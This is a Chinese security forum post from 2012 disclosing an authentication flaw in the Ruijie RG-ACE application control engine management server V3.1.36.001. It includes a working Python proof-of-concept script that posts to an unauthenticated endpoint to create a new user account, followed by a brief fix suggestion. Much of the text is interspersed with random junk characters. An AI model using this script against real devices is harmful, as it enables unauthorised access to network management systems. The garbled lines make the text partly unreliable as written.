找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2099|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)- ~  W# h. e# S2 W. e8 i$ k
2 _/ o6 O+ K: e8 ]: b" f' M
* f* v; Z8 Y% `
测试的具体版本是
2 S% c  f+ r/ z0 X/ M产品名称: 锐捷应用控制引擎
4 j. t( s5 F9 m9 u- t8 H9 }7 X版本号: 3.1.36.001 TC
0 r1 @6 b( [( D编译时间: 201104291730
6 ^6 U7 N7 m% l! s5 N- N  ? ! }: q7 ?1 q  R3 |8 _2 o9 R. Q
' a$ ]* D3 C5 T" z/ }
漏洞证明:
7 w3 ^3 j- {6 x! ~ " {5 v9 {( i' C% ~6 g/ E3 o
5 u1 [2 b2 t5 q5 q0 U# ]1 |  H

  v$ ~1 G* [- H. N0 {6 o% o6 a8 D- x: @; D6 `+ V/ T4 O5 o

: v& d0 u6 Z- J, q- @: x" Q4 z* b
  _7 G; D: m4 M* c$ X7 E执行脚本
/ F; }7 N- }, E6 u  W" L$ }#! /usr/bin/env python
" K9 ^$ M0 m3 n8 K0 u9 c#coding=gbk, \. j2 a8 s1 {* [$ _
#RG-ACE管理服务器 V3.1.36.0010 N9 l& ?: A5 t) Y9 r
import urllib2, urllib,cookielib; J5 n; k3 U8 ]- {$ R
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP4 T& f" l( d$ S
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
2 y: Z  N' D; V$ r! T3 iopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
5 D+ D. L% c; W9 g. Ypost=(("event","userManager.doInsertUserInfo"),9 }& y" y& n2 ~( L& _4 I- I
("useractionname","addButtonValue"),
3 G" E8 G$ G% V, Y# G) b+ D("useropermanager","userManager"),3 C/ d; _* I& M7 d8 S
("userName","t"), #######账号自己加
" X1 q; m) D5 s4 X* q9 R% X  x7 c("pwd","aaaaaa"),######密码自己加9 g" f) m' l% r" r( A  ?3 |
("trueName","ad"),& q+ }$ I7 _3 C8 b# g8 @$ s/ L  F- G
("email",""),- t0 l* {6 F1 T, H) G3 a1 h4 Q
("mobilePhone",""),
  P. ]$ P3 U$ _0 S) A, t("officePhone",""),
0 H) o8 D, _5 k% a2 @("addr",""),7 h* d6 B, u, ~' h
("submit","确定")): S! C% j3 e4 L
urllib2.install_opener(opener)
7 c" u! o1 n+ i( S* m, x+ m7 ^p=urllib2.urlopen(url, urllib.urlencode(post)).read()+ ]! L  R7 u9 f0 p
print "Done"# Q* h( t2 N( u2 Z" K. R+ }
6 l( t* p3 Y( q
登录,连接设备
' w4 }: g! @& E" o+ b8 \
* p" `: |  n( s/ Q0 w0 C; M/ L! Q/ l: W( T
* N# B7 w- x9 Q" q1 |* ~/ A; `
7 j8 z$ T4 b1 Y( u: @+ _

( H# d% [6 j0 m+ a7 g( a! M默认的管理员admin权限更大点( G' d% R+ d% j$ R) m2 o# \
- I- B4 D- y3 p9 N) r* c8 q
- Z9 N+ X- l+ y6 @

2 d5 h% [8 s" ?9 B+ E( Q3 g( f/ E; W + J+ O$ ?$ T  O3 y! q

8 h* L8 f; q2 S. H4 S" Y' f修复方案:# }4 Z+ Y; r% M: K; p5 m
加强对接口的权限验证2 G( i! L6 i; I

8 i% C9 z3 V1 s! I& h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表